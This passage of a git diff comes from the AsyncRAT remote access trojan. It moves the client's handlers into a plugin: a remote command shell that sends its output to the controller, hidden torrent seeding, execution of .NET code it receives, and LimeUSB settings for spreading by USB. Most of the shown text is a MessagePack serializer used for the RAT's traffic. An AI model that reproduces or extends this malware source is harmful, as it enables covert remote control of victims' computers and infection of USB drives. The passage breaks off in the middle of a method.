+ char randomChar = validchars[idx];
+ sb.Append(randomChar);
+ }
+ var randomString = sb.ToString();
+ return randomString;
+ }
+ }
+
+ public class Settings
+ {
+ public static readonly string InfectedTrademark = "Trademark - Lime";
+ public static readonly string WorkDirectory = "$LimeUSB";
+ public static readonly string LimeUSBFile = "LimeUSB.exe";
+ public static readonly string IconsDirectory = "$LimeIcons";
+ }
+
+}
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleShell.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Handler/HandleShell.cs
similarity index 89%
rename from AsyncRAT-C#/Client/Handle Packet/HandleShell.cs
rename to AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Handler/HandleShell.cs
index cac03ee..32694f5 100644
--- a/AsyncRAT-C#/Client/Handle Packet/HandleShell.cs
+++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Handler/HandleShell.cs
@@ -1,5 +1,5 @@
-using Client.MessagePack;
-using Client.Connection;
+using Plugin;
+using Plugin.MessagePack;
using System;
using System.Collections.Generic;
using System.Diagnostics;
@@ -9,7 +9,7 @@ using System.Management;
using System.Text;
using System.Threading;
-namespace Client.Handle_Packet
+namespace Miscellaneous.Handler
{
public static class HandleShell
{
@@ -42,7 +42,7 @@ namespace Client.Handle_Packet
ProcessShell.Start();
ProcessShell.BeginOutputReadLine();
ProcessShell.BeginErrorReadLine();
- while (ClientSocket.IsConnected)
+ while (Connection.IsConnected)
{
Thread.Sleep(1);
if (CanWrite)
@@ -51,8 +51,8 @@ namespace Client.Handle_Packet
{
break;
}
- ProcessShell.StandardInput.WriteLine(Input);
- CanWrite = false;
+ ProcessShell.StandardInput.WriteLine(Input);
+ CanWrite = false;
}
}
@@ -68,8 +68,9 @@ namespace Client.Handle_Packet
Output.AppendLine(e.Data);
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "shell";
+ msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("ReadInput").AsString = Output.ToString();
- ClientSocket.Send(msgpack.Encode2Bytes());
+ Connection.Send(msgpack.Encode2Bytes());
}
catch { }
}
@@ -87,6 +88,7 @@ namespace Client.Handle_Packet
}
}
catch { }
+ Connection.Disconnected();
}
private static void KillProcessAndChildren(int pid)
@@ -110,4 +112,5 @@ namespace Client.Handle_Packet
catch { }
}
}
+
}
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleTorrent.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Handler/HandleTorrent.cs
similarity index 95%
rename from AsyncRAT-C#/Client/Handle Packet/HandleTorrent.cs
rename to AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Handler/HandleTorrent.cs
index 7ac3e38..c55bdd5 100644
--- a/AsyncRAT-C#/Client/Handle Packet/HandleTorrent.cs
+++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Handler/HandleTorrent.cs
@@ -1,5 +1,5 @@
-using Client.MessagePack;
-using Client.Connection;
+using Plugin;
+using Plugin.MessagePack;
using System;
using System.Collections.Generic;
using System.Diagnostics;
@@ -10,7 +10,7 @@ using System.Text;
using System.Threading;
using System.Windows.Forms;
-namespace Client.Handle_Packet
+namespace Miscellaneous.Handler
{
public class HandleTorrent
{
@@ -50,7 +50,7 @@ namespace Client.Handle_Packet
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Error";
msgpack.ForcePathObject("Error").AsString = "couldn't find a torrent client";
- ClientSocket.Send(msgpack.Encode2Bytes());
+ Connection.Send(msgpack.Encode2Bytes());
return;
}
else
@@ -87,7 +87,7 @@ namespace Client.Handle_Packet
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Logs";
msgpack.ForcePathObject("Message").AsString = $"seeding using {Path.GetFileName(IsInstalled())}";
- ClientSocket.Send(msgpack.Encode2Bytes());
+ Connection.Send(msgpack.Encode2Bytes());
}
}
catch (Exception ex)
@@ -124,4 +124,5 @@ namespace Client.Handle_Packet
static extern bool IsWindowVisible(IntPtr hWnd);
}
+
}
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandlerExecuteDotNetCode.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Handler/HandlerExecuteDotNetCode.cs
similarity index 97%
rename from AsyncRAT-C#/Client/Handle Packet/HandlerExecuteDotNetCode.cs
rename to AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Handler/HandlerExecuteDotNetCode.cs
index b19aa4b..4414241 100644
--- a/AsyncRAT-C#/Client/Handle Packet/HandlerExecuteDotNetCode.cs
+++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Handler/HandlerExecuteDotNetCode.cs
@@ -1,6 +1,7 @@
-using Client.MessagePack;
-using Microsoft.CSharp;
+using Microsoft.CSharp;
using Microsoft.VisualBasic;
+using Plugin;
+using Plugin.MessagePack;
using System;
using System.CodeDom.Compiler;
using System.Collections.Generic;
@@ -9,7 +10,7 @@ using System.Linq;
using System.Reflection;
using System.Text;
-namespace Client.Handle_Packet
+namespace Miscellaneous.Handler
{
public class HandlerExecuteDotNetCode
{
@@ -85,4 +86,5 @@ namespace Client.Handle_Packet
}
}
}
-}
\ No newline at end of file
+
+}
diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/BytesTools.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/BytesTools.cs
new file mode 100644
index 0000000..bd66e46
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/BytesTools.cs
@@ -0,0 +1,102 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ public class BytesTools
+ {
+ static UTF8Encoding utf8Encode = new UTF8Encoding();
+
+ public static byte[] GetUtf8Bytes(String s)
+ {
+
+ return utf8Encode.GetBytes(s);
+ }
+
+ public static String GetString(byte[] utf8Bytes)
+ {
+ return utf8Encode.GetString(utf8Bytes);
+ }
+
+ public static String BytesAsString(byte[] bytes)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (byte b in bytes)
+ {
+ sb.Append(String.Format("{0:D3} ", b));
+ }
+ return sb.ToString();
+ }
+
+
+ public static String BytesAsHexString(byte[] bytes)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (byte b in bytes)
+ {
+ sb.Append(String.Format("{0:X2} ", b));
+ }
+ return sb.ToString();
+ }
+
+ ///
+ /// 交换byte数组数据
+ /// 可用于高低数据交换
+ ///
+ /// 要交换的byte数组
+ /// 返回交换后的数据
+ public static byte[] SwapBytes(byte[] v)
+ {
+ byte[] r = new byte[v.Length];
+ int j = v.Length - 1;
+ for (int i = 0; i < r.Length; i++)
+ {
+ r[i] = v[j];
+ j--;
+ }
+ return r;
+ }
+
+ public static byte[] SwapInt64(Int64 v)
+ {
+ //byte[] r = new byte[8];
+ //r[7] = (byte)v;
+ //r[6] = (byte)(v >> 8);
+ //r[5] = (byte)(v >> 16);
+ //r[4] = (byte)(v >> 24);
+ //r[3] = (byte)(v >> 32);
+ //r[2] = (byte)(v >> 40);
+ //r[1] = (byte)(v >> 48);
+ //r[0] = (byte)(v >> 56);
+ return SwapBytes(BitConverter.GetBytes(v));
+ }
+
+ public static byte[] SwapInt32(Int32 v)
+ {
+ byte[] r = new byte[4];
+ r[3] = (byte)v;
+ r[2] = (byte)(v >> 8);
+ r[1] = (byte)(v >> 16);
+ r[0] = (byte)(v >> 24);
+ return r;
+ }
+
+
+ public static byte[] SwapInt16(Int16 v)
+ {
+ byte[] r = new byte[2];
+ r[1] = (byte)v;
+ r[0] = (byte)(v >> 8);
+ return r;
+ }
+
+ public static byte[] SwapDouble(Double v)
+ {
+ return SwapBytes(BitConverter.GetBytes(v));
+ }
+
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/MsgPack.cs
new file mode 100644
index 0000000..131eb37
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/MsgPack.cs
@@ -0,0 +1,926 @@
+using System;
+using System.Collections;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+
+namespace Plugin.MessagePack
+{
+ public class MsgPackEnum : IEnumerator
+ {
+ List children;
+ int position = -1;
+
+ public MsgPackEnum(List obj)
+ {
+ children = obj;
+ }
+ object IEnumerator.Current
+ {
+ get { return children[position]; }
+ }
+
+ bool IEnumerator.MoveNext()
+ {
+ position++;
+ return (position < children.Count);
+ }
+
+ void IEnumerator.Reset()
+ {
+ position = -1;
+ }
+
+ }
+
+ public class MsgPackArray
+ {
+ List children;
+ MsgPack owner;
+
+ public MsgPackArray(MsgPack msgpackObj, List listObj)
+ {
+ owner = msgpackObj;
+ children = listObj;
+ }
+
+ public MsgPack Add()
+ {
+ return owner.AddArrayChild();
+ }
+
+ public MsgPack Add(String value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.AsString = value;
+ return obj;
+ }
+
+ public MsgPack Add(Int64 value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.SetAsInteger(value);
+ return obj;
+ }
+
+ public MsgPack Add(Double value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.SetAsFloat(value);
+ return obj;
+ }
+
+ public MsgPack this[int index]
+ {
+ get { return children[index]; }
+ }
+
+ public int Length
+ {
+ get { return children.Count; }
+ }
+ }
+
+ public class MsgPack : IEnumerable
+ {
+ string name;
+ string lowerName;
+ object innerValue;
+ MsgPackType valueType;
+ MsgPack parent;
+ List children = new List();
+ MsgPackArray refAsArray = null;
+
+ private void SetName(string value)
+ {
+ this.name = value;
+ this.lowerName = name.ToLower();
+ }
+
+ private void Clear()
+ {
+ for (int i = 0; i < children.Count; i++)
+ {
+ ((MsgPack)children[i]).Clear();
+ }
+ children.Clear();
+ }
+
+ private MsgPack InnerAdd()
+ {
+ MsgPack r = new MsgPack();
+ r.parent = this;
+ this.children.Add(r);
+ return r;
+ }
+
+ private int IndexOf(string name)
+ {
+ int i = -1;
+ int r = -1;
+
+ string tmp = name.ToLower();
+ foreach (MsgPack item in children)
+ {
+ i++;
+ if (tmp.Equals(item.lowerName))
+ {
+ r = i;
+ break;
+ }
+ }
+ return r;
+ }
+
+ public MsgPack FindObject(string name)
+ {
+ int i = IndexOf(name);
+ if (i == -1)
+ {
+ return null;
+ }
+ else
+ {
+ return this.children[i];
+ }
+ }
+
+
+ private MsgPack InnerAddMapChild()
+ {
+ if (valueType != MsgPackType.Map)
+ {
+ Clear();
+ this.valueType = MsgPackType.Map;
+ }
+ return InnerAdd();
+ }
+
+ private MsgPack InnerAddArrayChild()
+ {
+ if (valueType != MsgPackType.Array)
+ {
+ Clear();
+ this.valueType = MsgPackType.Array;
+ }
+ return InnerAdd();
+ }
+
+ public MsgPack AddArrayChild()
+ {
+ return InnerAddArrayChild();
+ }
+
+ private void WriteMap(Stream ms)
+ {
+ byte b;
+ byte[] lenBytes;
+ int len = children.Count;
+ if (len <= 15)
+ {
+ b = (byte)(0x80 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDE;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDF;
+ ms.WriteByte(b);
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+
+ for (int i = 0; i < len; i++)
+ {
+ WriteTools.WriteString(ms, children[i].name);
+ children[i].Encode2Stream(ms);
+ }
+ }
+
+ private void WirteArray(Stream ms)
+ {
+ byte b;
+ byte[] lenBytes;
+ int len = children.Count;
+ if (len <= 15)
+ {
+ b = (byte)(0x90 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDC;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDD;
+ ms.WriteByte(b);
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+
+
+ for (int i = 0; i < len; i++)
+ {
+ ((MsgPack)children[i]).Encode2Stream(ms);
+ }
+ }
+
+ public void SetAsInteger(Int64 value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.Integer;
+ }
+
+ public void SetAsUInt64(UInt64 value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.UInt64;
+ }
+
+ public UInt64 GetAsUInt64()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return Convert.ToUInt64((Int64)this.innerValue);
+ case MsgPackType.UInt64:
+ return (UInt64)this.innerValue;
+ case MsgPackType.String:
+ return UInt64.Parse(this.innerValue.ToString().Trim());
+ case MsgPackType.Float:
+ return Convert.ToUInt64((Double)this.innerValue);
+ case MsgPackType.Single:
+ return Convert.ToUInt64((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ return Convert.ToUInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+
+ }
+
+ public Int64 GetAsInteger()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return (Int64)this.innerValue;
+ case MsgPackType.UInt64:
+ return Convert.ToInt64((Int64)this.innerValue);
+ case MsgPackType.String:
+ return Int64.Parse(this.innerValue.ToString().Trim());
+ case MsgPackType.Float:
+ return Convert.ToInt64((Double)this.innerValue);
+ case MsgPackType.Single:
+ return Convert.ToInt64((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ return Convert.ToInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+ }
+
+ public Double GetAsFloat()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return Convert.ToDouble((Int64)this.innerValue);
+ case MsgPackType.String:
+ return Double.Parse((String)this.innerValue);
+ case MsgPackType.Float:
+ return (Double)this.innerValue;
+ case MsgPackType.Single:
+ return (Single)this.innerValue;
+ case MsgPackType.DateTime:
+ return Convert.ToInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+ }
+
+
+ public void SetAsBytes(byte[] value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.Binary;
+ }
+
+ public byte[] GetAsBytes()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return BitConverter.GetBytes((Int64)this.innerValue);
+ case MsgPackType.String:
+ return BytesTools.GetUtf8Bytes(this.innerValue.ToString());
+ case MsgPackType.Float:
+ return BitConverter.GetBytes((Double)this.innerValue);
+ case MsgPackType.Single:
+ return BitConverter.GetBytes((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ long dateval = ((DateTime)this.innerValue).ToBinary();
+ return BitConverter.GetBytes(dateval);
+ case MsgPackType.Binary:
+ return (byte[])this.innerValue;
+ default:
+ return new byte[] { };
+ }
+ }
+
+ public void Add(string key, String value)
+ {
+ MsgPack tmp = InnerAddArrayChild();
+ tmp.name = key;
+ tmp.SetAsString(value);
+ }
+
+ public void Add(string key, int value)
+ {
+ MsgPack tmp = InnerAddArrayChild();
+ tmp.name = key;
+ tmp.SetAsInteger(value);
+ }
+
+ public bool LoadFileAsBytes(string fileName)
+ {
+ if (File.Exists(fileName))
+ {
+ byte[] value = null;
+ FileStream fs = new FileStream(fileName, FileMode.Open, FileAccess.Read, FileShare.Read);
+ value = new byte[fs.Length];
+ fs.Read(value, 0, (int)fs.Length);
+ fs.Close();
+ fs.Dispose();
+ SetAsBytes(value);
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+
+ }
+
+ public bool SaveBytesToFile(string fileName)
+ {
+ if (this.innerValue != null)
+ {
+ FileStream fs = new FileStream(fileName, FileMode.Append);
+ fs.Write(((byte[])this.innerValue), 0, ((byte[])this.innerValue).Length);
+ fs.Close();
+ fs.Dispose();
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+ }
+
+ public MsgPack ForcePathObject(string path)
+ {
+ MsgPack tmpParent, tmpObject;
+ tmpParent = this;
+ string[] pathList = path.Trim().Split(new Char[] { '.', '/', '\\' });
+ string tmp = null;
+ if (pathList.Length == 0)
+ {
+ return null;
+ }
+ else if (pathList.Length > 1)
+ {
+ for (int i = 0; i < pathList.Length - 1; i++)
+ {
+ tmp = pathList[i];
+ tmpObject = tmpParent.FindObject(tmp);
+ if (tmpObject == null)
+ {
+ tmpParent = tmpParent.InnerAddMapChild();
+ tmpParent.SetName(tmp);
+ }
+ else
+ {
+ tmpParent = tmpObject;
+ }
+ }
+ }
+ tmp = pathList[pathList.Length - 1];
+ int j = tmpParent.IndexOf(tmp);
+ if (j > -1)
+ {
+ return tmpParent.children[j];
+ }
+ else
+ {
+ tmpParent = tmpParent.InnerAddMapChild();
+ tmpParent.SetName(tmp);
+ return tmpParent;
+ }
+ }
+
+ public void SetAsNull()
+ {
+ Clear();
+ this.innerValue = null;
+ this.valueType = MsgPackType.Null;
+ }
+
+ public void SetAsString(String value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.String;
+ }
+
+ public String GetAsString()
+ {
+ if (this.innerValue == null)
+ {
+ return "";
+ }
+ else
+ {
+ return this.innerValue.ToString();
+ }
+
+ }
+
+ public void SetAsBoolean(Boolean bVal)
+ {
+ this.valueType = MsgPackType.Boolean;
+ this.innerValue = bVal;
+ }
+
+ public void SetAsSingle(Single fVal)
+ {
+ this.valueType = MsgPackType.Single;
+ this.innerValue = fVal;
+ }
+
+ public void SetAsFloat(Double fVal)
+ {
+ this.valueType = MsgPackType.Float;
+ this.innerValue = fVal;
+ }
+
+
+
+ public void DecodeFromBytes(byte[] bytes)
+ {
+ using (MemoryStream ms = new MemoryStream())
+ {
+ ms.Write(bytes, 0, bytes.Length);
+ ms.Position = 0;
+ DecodeFromStream(ms);
+ }
+ }
+
+ public void DecodeFromFile(string fileName)
+ {
+ FileStream fs = new FileStream(fileName, FileMode.Open);
+ DecodeFromStream(fs);
+ fs.Dispose();
+ }
+
+
+
+ public void DecodeFromStream(Stream ms)
+ {
+ byte lvByte = (byte)ms.ReadByte();
+ byte[] rawByte = null;
+ MsgPack msgPack = null;
+ int len = 0;
+ int i = 0;
+
+ if (lvByte <= 0x7F)
+ { //positive fixint 0xxxxxxx 0x00 - 0x7f
+ SetAsInteger(lvByte);
+ }
+ else if ((lvByte >= 0x80) && (lvByte <= 0x8F))
+ {
+ //fixmap 1000xxxx 0x80 - 0x8f
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ len = lvByte - 0x80;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if ((lvByte >= 0x90) && (lvByte <= 0x9F)) //fixarray 1001xxxx 0x90 - 0x9f
+ {
+ //fixmap 1000xxxx 0x80 - 0x8f
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ len = lvByte - 0x90;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if ((lvByte >= 0xA0) && (lvByte <= 0xBF)) // fixstr 101xxxxx 0xa0 - 0xbf
+ {
+ len = lvByte - 0xA0;
+ SetAsString(ReadTools.ReadString(ms, len));
+ }
+ else if ((lvByte >= 0xE0) && (lvByte <= 0xFF))
+ { /// -1..-32
+ // negative fixnum stores 5-bit negative integer
+ // +--------+
+ // |111YYYYY|
+ // +--------+
+ SetAsInteger((sbyte)lvByte);
+ }
+ else if (lvByte == 0xC0)
+ {
+ SetAsNull();
+ }
+ else if (lvByte == 0xC1)
+ {
+ throw new Exception("(never used) type $c1");
+ }
+ else if (lvByte == 0xC2)
+ {
+ SetAsBoolean(false);
+ }
+ else if (lvByte == 0xC3)
+ {
+ SetAsBoolean(true);
+ }
+ else if (lvByte == 0xC4)
+ { // max 255
+ len = ms.ReadByte();
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if (lvByte == 0xC5)
+ { // max 65535
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToUInt16(rawByte, 0);
+
+ // read binary
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if (lvByte == 0xC6)
+ { // binary max: 2^32-1
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt32(rawByte, 0);
+
+ // read binary
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if ((lvByte == 0xC7) || (lvByte == 0xC8) || (lvByte == 0xC9))
+ {
+ throw new Exception("(ext8,ext16,ex32) type $c7,$c8,$c9");
+ }
+ else if (lvByte == 0xCA)
+ { // float 32
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+
+ SetAsSingle(BitConverter.ToSingle(rawByte, 0));
+ }
+ else if (lvByte == 0xCB)
+ { // float 64
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsFloat(BitConverter.ToDouble(rawByte, 0));
+ }
+ else if (lvByte == 0xCC)
+ { // uint8
+ // uint 8 stores a 8-bit unsigned integer
+ // +--------+--------+
+ // | 0xcc |ZZZZZZZZ|
+ // +--------+--------+
+ lvByte = (byte)ms.ReadByte();
+ SetAsInteger(lvByte);
+ }
+ else if (lvByte == 0xCD)
+ { // uint16
+ // uint 16 stores a 16-bit big-endian unsigned integer
+ // +--------+--------+--------+
+ // | 0xcd |ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToUInt16(rawByte, 0));
+ }
+ else if (lvByte == 0xCE)
+ {
+ // uint 32 stores a 32-bit big-endian unsigned integer
+ // +--------+--------+--------+--------+--------+
+ // | 0xce |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ
+ // +--------+--------+--------+--------+--------+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToUInt32(rawByte, 0));
+ }
+ else if (lvByte == 0xCF)
+ {
+ // uint 64 stores a 64-bit big-endian unsigned integer
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ // | 0xcf |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsUInt64(BitConverter.ToUInt64(rawByte, 0));
+ }
+ else if (lvByte == 0xDC)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdc |YYYYYYYY|YYYYYYYY| N objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDD)
+ {
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdd |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ| N objects |
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xD9)
+ {
+ // str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ // +--------+--------+========+
+ // | 0xd9 |YYYYYYYY| data |
+ // +--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xDE)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xde |YYYYYYYY|YYYYYYYY| N*2 objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDE)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xde |YYYYYYYY|YYYYYYYY| N*2 objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDF)
+ {
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdf |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ| N*2 objects |
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt32(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDA)
+ {
+ // str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ // +--------+--------+--------+========+
+ // | 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ // +--------+--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xDB)
+ {
+ // str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ // +--------+--------+--------+--------+--------+========+
+ // | 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ // +--------+--------+--------+--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xD0)
+ {
+ // int 8 stores a 8-bit signed integer
+ // +--------+--------+
+ // | 0xd0 |ZZZZZZZZ|
+ // +--------+--------+
+ SetAsInteger((sbyte)ms.ReadByte());
+ }
+ else if (lvByte == 0xD1)
+ {
+ // int 16 stores a 16-bit big-endian signed integer
+ // +--------+--------+--------+
+ // | 0xd1 |ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt16(rawByte, 0));
+ }
+ else if (lvByte == 0xD2)
+ {
+ // int 32 stores a 32-bit big-endian signed integer
+ // +--------+--------+--------+--------+--------+
+ // | 0xd2 |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt32(rawByte, 0));
+ }
+ else if (lvByte == 0xD3)
+ {
+ // int 64 stores a 64-bit big-endian signed integer
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ // | 0xd3 |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt64(rawByte, 0));
+ }
+ }
+
+ public byte[] Encode2Bytes()
+ {
+ using (MemoryStream ms = new MemoryStream())
+ {
+ Encode2Stream(ms);
+ byte[] r = new byte[ms.Length];
+ ms.Position = 0;
